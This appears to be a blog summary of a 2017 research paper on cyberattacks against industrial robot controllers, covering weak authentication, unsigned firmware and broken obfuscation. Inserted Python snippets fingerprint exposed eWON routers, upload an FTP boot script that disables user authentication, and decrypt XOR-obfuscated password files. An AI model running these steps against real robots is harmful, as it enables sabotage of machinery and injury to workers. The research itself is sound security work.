An experimental security analysis of an industrial robot controller Quarta et al., IEEE Security and Privacy 2017

This is an industrial robot:

The International Federation of Robotics forecasts that, by 2018, approximately 1.3 million industrial robot units will be employed in factories globally, and the international market value for “robotized” systems is approximately 32 billion USD. In all of their forms, robots are complex automation devices that heavily interact with the physical world…

Most of these control systems were born in an era when they were assumed to be isolated from the network, but are now gaining new interconnections. And hey, guess what:

Unfortunately, even a simple Shodan query shows that sometimes industrial robots are exposed on the Internet without being properly secured.

In this paper, the authors undertake a systematic analysis of the attack surface and potential impacts of cyber attacks against industrial robots. Their findings are sadly not surprising, yet at the same time some of the things you’re about to read may leave you open-mouthed in disbelief. It’s a perfect case study in how not to do things!

Welcome to Industry 4.0 and the world of connected robots

Industrial robots are “connected” primarily for programming and maintenance purposes – a use case specified by ISO standards. For instance, in a large car production plant developed by KUKA Robotics, all 259 robots are connected to central control and monitoring systems.

The industrial robot ecosystem is blooming: there are “Robot Web Service” HTTP REST APIs, a Robot App Store (http://www.robotappstore.com/), and venues where users can exchange models, videos, add-ins and “apps” (https://robotapps.robotstudio.com). The authors make three high level observations about the ecosystem:

  1. The increased connectivity of computer and robot systems is (and will be) exposing robots to cyberattacks. Indeed, nowadays, industrial robots – originally designed to be isolated – are exposed to corporate networks and to the Internet.
  2. The safety systems governing robots are increasingly implemented in software.
  3. Awareness of security risks within the ecosystem is very low (confirmed by both a small scale survey undertaken by the authors, and the shocking state of security in practice as we’ll see).

In order to attack industrial robots, you need to know something about them of course. Thankfully that knowledge is easy to obtain:

Realistically [attackers] can rely on publicly available information (e.g., controller software and firmware available for download from the vendor’s website), and some reverse engineering. As a matter of fact, we learned most of the details described in this paper by reading freely available technical documentation. Therefore, an attacker can do the same.

If you want access to equipment to verify your attacks before deploying them you’ve got two routes open to you. Firstly, vendors distribute simulators – which in at least one case share most of the code (and thus most of the vulnerabilities) with the firmware of the controller’s computer. Secondly, you can buy parts or even complete robots on the second-hand market (at costs ranging from $13K to $36K).

Robot controllers may be accessible over the network in one of several ways:

  • At the base level, they may just be connected to the factory LAN, which an attacker can gain access to through a variety of methods (out of scope for this paper).
  • Sometimes controllers are directly accessible from the Internet – using Shodan and ZoomEye to look for string patterns in the FTP banners of top robot manufacturers found several hits. (And as we’ll see, you can change the robot configuration by uploading files via that FTP service).
  • Most commonly, robots embed proprietary remote access devices used by the vendor for remote monitoring and maintenance. In the industry jargon, these are known as industrial routers. We could call them ‘backdoors.’

Industrial routers provide a helpful attack surface for gaining access to a robot controller. For example, an attacker could target a widespread vendor of such appliances, whose products are also resold by robotics OEMs as part of their support contracts. Among these vendors, eWON is quite representative. A simple Shodan query for the default banner of the embedded web server (Server: eWON) yielded 1,044 results, without accounting for customized banners. The web-based configuration console is easily “fingerprintable,” and an attacker could exploit vulnerabilities or misconfigurations in the router to gain access to the robot.
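To show how cheap this kind of fingerprinting is, here is a minimal Python sketch that issues an HTTP HEAD request and matches the Server header against the default eWON banner. The host and port are placeholders, not real endpoints:

```python
import http.client

def is_ewon_banner(server_header: str) -> bool:
    """True if an HTTP Server header matches the default eWON banner."""
    return "eWON" in server_header

def probe(host: str, port: int = 80, timeout: float = 5.0) -> bool:
    """Fingerprint a single host by its Server header.

    The target host is hypothetical; a real scan would simply iterate
    over Shodan/ZoomEye results instead of probing directly.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/")
        return is_ewon_banner(conn.getresponse().getheader("Server", ""))
    finally:
        conn.close()
```

Note that this matches only the default banner; as the authors point out, customized banners would slip past such a naive check, so the 1,044 figure is a lower bound.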

Threat scenarios

Given the nature of the tasks that industrial robots undertake, they require accuracy, safety, and integrity.

  • A robot should read precise values from sensors and should issue correct and accurate commands to the actuators so that movements are performed within acceptable error margins. “A violation of this requirement could translate into small defects in the outcome. For example, if a robot is used for welding, a minimal change in how the weld is carried out could structurally undermine the workpiece, which in the case of a car body could possibly mean tragic consequences for the end user safety.”
  • Safety requirements are governed by ISO standards, and require that operators always be able to take safe and informed decisions, and engage emergency procedures when needed.
  • A robot controller also needs to minimise the risk of badly written control logic damaging its parts.

At a high level attackers can attempt to violate these requirements to a variety of ends. For example, injecting faults and micro-defects in production, which could lead to immediate or delayed financial loss, damaged reputation, and possibly even fatalities depending on what is being manufactured. An attacker could also damage machinery or cause injuries to factory workers by disabling or altering safety devices. Then there are ‘denial of production’ attacks which introduce downtime: “the vice president of product development at FANUC stated that ‘unplanned downtime can cost as much as $20,000 in potential profit loss per minute, and up to $2 million for a single incident.’” (That’s a whole new kind of ransomware waiting to happen right there). Finally it might just be good old industrial espionage – leaking sensitive data about production schedules and volumes, source code, etc.

Attacks

To make things a bit more concrete, here are five attack vectors.

  1. Configuration tampering. An attacker able to access a configuration file can modify parameters affecting robot movements. Closed loop control systems make a controlled variable follow a reference signal as closely as possible, and the parameters affect how well they are able to do this. Sub-optimal tuning can result in the robot being slow to reach the desired position, violating accuracy requirements (think poor welds, milling too much material away). Bad parameter settings can lead to controller instability, overshooting of set points, violation of safety properties, and ultimately potential for physical damage. There are also open loop control systems designed to smooth the signals generated by closed loop controls. Fiddling with their settings can amplify resonance effects, leading to violations of integrity requirements and safety boundaries. The configuration also contains core settings specific to the type of manipulator (controller models are often shared across different robots). Change these and you can alter the amount of force applied (to exceed safety limits), or simply destroy either the workpiece or its surrounding environment. Finally, several kinds of safety limits are also specified in the configuration file, allowing them to be changed at will by the attacker.
  2. User-perceived robot state alteration. “The impact of a mere UI-modification attack is remarkable. Altering the UI could hide or change the true robot status, fooling operators into a wrong evaluation of risk, and, consequently, creating a substantial safety hazard.”
  3. Robot state alteration. Beyond altering the perceived state as above, an attacker can also alter the actual state of the robot. For example, silently switching between manual mode (which gives a set of safeguards for teaching the robot) and automatic mode when humans should not be nearby. Furthermore, “Some vendors implement safety features, such as emergency stop buttons, in software. Worse, modern teach pendants (which include an e-stop button) are wireless…”
  4. Production logic tampering. If the end-to-end integrity of the file defining the task the robot is to carry out is not protected, then it is possible for an attacker to arbitrarily alter production logic. “For example, the attacker could insert small defects, trojanize the workpiece, or fully compromise the manufacturing process.”
  5. Calibration parameters tampering. Calibration data is passed to the controller during system boot, but can also be manipulated later on. This can cause a servo motor to move erratically or unexpectedly.
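The closed-loop tuning attack in (1) can be made concrete with a toy simulation. This is not the controller’s real dynamics, just a minimal first-order plant under proportional control: with a sane gain the robot axis glides to the set point, while a tampered gain makes the loop unstable.

```python
def simulate(kp: float, ref: float = 1.0, dt: float = 0.01, steps: int = 200) -> float:
    """Euler simulation of a first-order plant x' = u driven by the
    proportional control law u = kp * (ref - x).

    Returns the peak |x| reached over the run; with a well-tuned gain
    this never exceeds the set point, with a bad gain it blows up.
    """
    x, peak = 0.0, 0.0
    for _ in range(steps):
        u = kp * (ref - x)   # proportional control: push towards the reference
        x += dt * u          # the plant integrates the commanded velocity
        peak = max(peak, abs(x))
    return peak
```

With dt = 0.01 this discrete loop is stable only for gains below 2/dt = 200: a gain of 50 approaches the set point smoothly, while a tampered gain of 250 produces exponentially growing oscillation, i.e. exactly the controller instability and overshoot described above.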

A case study

As an example, the authors evaluate one specific system and demonstrate attacks against it. I have a suspicion they could have picked many other targets and obtained very similar findings. You can find the full details in section VI of the paper. I’m just going to highlight here some of the more jaw-dropping discoveries.

The robot uses FTP to share files and system information between the controller and the internal network and custom services. There is also a ‘RobAPI’ (TCP protocol) that offers a more comprehensive network attack surface, and a UDP-based discovery service to help discover robot controllers on the network (how thoughtful!). There is an optional User Authentication System, which when enabled uses a simple role-based access control scheme.

The authentication is useless

Firstly, it’s disabled during system boot, when a set of hard-coded default static credentials can be used to access the shared file system. Secondly, there is a default user, without a password, that cannot be changed or removed. Then there is another specific user that can ‘only’ access FTP paths relating to the /command device driver (see the next section), whose credentials are embedded in the firmware and cannot be changed (the same for every instance, of course).

If using any of these sets of credentials is too much hassle, it’s also possible to completely bypass authentication for both FTP and RobAPI access due to an implementation flaw.

The controller can be completely reconfigured via FTP upload

Any file written over FTP to the path /command/command or /command/command.cmd is interpreted as a script and executed during booting. The remote service box, for example, uses this functionality to automatically configure itself. If you include the command shell uas_disable in this file, the user authentication system will be disabled.
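For illustration, uploading such a file takes only a few lines of Python. The host and credentials below are placeholders (and, as noted above, authentication can be bypassed anyway); the /command/command.cmd path and the shell uas_disable directive are the ones described in the paper:

```python
import io
from ftplib import FTP

def build_boot_script() -> bytes:
    """Boot-time command script that turns off the User Authentication System."""
    return b"shell uas_disable\n"

def disable_uas(host: str, user: str, password: str) -> None:
    """Sketch of the attack: any file stored at /command/command.cmd is
    interpreted as a script and executed at the next boot.

    host/user/password are hypothetical placeholders, not real values.
    """
    with FTP(host) as ftp:
        ftp.login(user, password)
        ftp.storbinary("STOR /command/command.cmd", io.BytesIO(build_boot_script()))
```

The attack needs nothing beyond a standard FTP client, which is rather the point.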

The “cryptography” is a joke

encryption schemes are used to safeguard the integrity of some specific and safety-critical configuration files, such as the ones containing sensitive control loop parameters. We found such schemes to be weak obfuscation/integrity mechanisms rather than proper encryption: keys are derived from the file name and, in some cases, part of the file content. By reverse engineering the controller firmware, we found all the information needed to reconstruct the encryption keys: An attacker who can access a firmware update, or who has file system access, is able to read and modify safety- and accuracy-critical configuration files.

Here’s an example: the UAS configuration (including the plaintext passwords of all users) is stored in an XML file obfuscated through a bit-wise XOR operation with a random key. In case you need it, the key is stored at the beginning of the obfuscated file itself. To quote the authors, “the obfuscation is completely useless.”
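The scheme is easy to sketch, and just as easy to undo. The key length and exact file layout below are illustrative assumptions (the real format is vendor-specific); the point is that XOR with a key stored in the file itself offers no protection at all:

```python
def obfuscate(plain: bytes, key: bytes) -> bytes:
    """The scheme as described: prepend the key, XOR the payload with it."""
    return key + bytes(b ^ key[i % len(key)] for i, b in enumerate(plain))

def deobfuscate(blob: bytes, key_len: int) -> bytes:
    """Recover the plaintext: the key is simply the first key_len bytes
    of the file (key_len is an assumption for illustration)."""
    key, body = blob[:key_len], blob[key_len:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))
```

Anyone with read access to the file has, by construction, read access to the key, so the XOR round-trips trivially.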

There is no protection against memory errors

… it is far easier to exploit memory corruption vulnerabilities in the robot we analyzed than in mainstream OSs. Industrial robots, like many embedded systems, employ real-time operating systems (RTOSs) with poor or no hardening features.

Given that there is also no privilege separation between processes or between user space and kernel space, exploiting memory corruption is trivial. And did the authors find such exploitable memory errors in the code? Of course they did!

The fact that we found textbook vulnerabilities in one of the most widely deployed robot controllers is an indicator that not even basic static checking was in place.

Nothing is signed

The boot image that the system downloads is not signed, and can be easily modified by an attacker who can reverse engineer the file format (hint: it’s a zip-compressed binary). There are no code-signing mechanisms for vendor firmware, program task code, or custom software developed on top of the provided SDKs.
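For contrast, even a minimal integrity gate would stop the trivial unzip-edit-rezip attack. The sketch below pins a SHA-256 digest of a known-good image; real code signing would of course use an asymmetric signature over the image rather than a pinned hash, but the controller has neither:

```python
import hashlib

def verify_image(image: bytes, trusted_digest_hex: str) -> bool:
    """Refuse any boot image whose SHA-256 digest doesn't match a digest
    held in trusted storage. A stand-in for the code-signing check the
    controller lacks; proper signing would use an asymmetric signature
    so the device need not keep a per-image secret."""
    return hashlib.sha256(image).hexdigest() == trusted_digest_hex
```

Without any such check, the boot image is accepted verbatim, and an attacker who can write to it owns the controller from the first instruction.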

Security checks aren’t checked

The compliance tool that checks code doesn’t perform a set of restricted operations (such as use of reflection and raw access to the filesystem) only makes checks within the development environment. And even then the checks it does are too simplistic (e.g., an incomplete blacklist for file operations that still permits full unrestricted access to the shared file system). But it gets worse:

Alas, the version of the compliance tool provided with the SDK does not enforce these restrictions at all. It is also evident that an attacker could bypass this by simply modifying the compliance tool itself: there is no way to perform these security checks on the programmer’s side in a completely safe manner.
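A hypothetical sketch of why blacklist-style checks of this kind fail: anything not literally on the list, including equally dangerous API surface, sails through. The banned names below are invented for illustration, not taken from the actual tool:

```python
# Hypothetical blacklist, invented for illustration.
BANNED_CALLS = {
    "System.IO.File.Delete",
    "System.Reflection.Assembly.Load",
}

def naive_compliance_check(source: str) -> bool:
    """Pass (True) unless the source literally mentions a banned call.
    A substring blacklist like this cannot enumerate every dangerous
    API, so near-miss calls are waved through."""
    return not any(banned in source for banned in BANNED_CALLS)
```

And as the authors note, even a perfect client-side check is moot: the attacker controls the tool doing the checking.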

Everything is out of date

For backwards compatibility reasons, the ‘FlexPendant’ (human interface) “will continue running an old, unsupported, and potentially vulnerable version of the .NET framework.”

And so…

It should come as no surprise to you that the authors were able to successfully demonstrate attacks taking complete control over the controller.

Cyber security and safety standards

The authors give a set of guidelines for hardening industrial robot systems which you can find in section VII. Unfortunately, it looks like a long road ahead.

…none of the [existing industrial robots standards] account for cyber-security threats: although some of them have mild security implications, they do not explicitly account for adversarial control during risk assessment.

You may think some of the attacks described, such as manipulating welds so that they are deliberately weak, sound a little far-fetched. But I have reasons to believe that similar attacks have previously been demonstrated in the wild.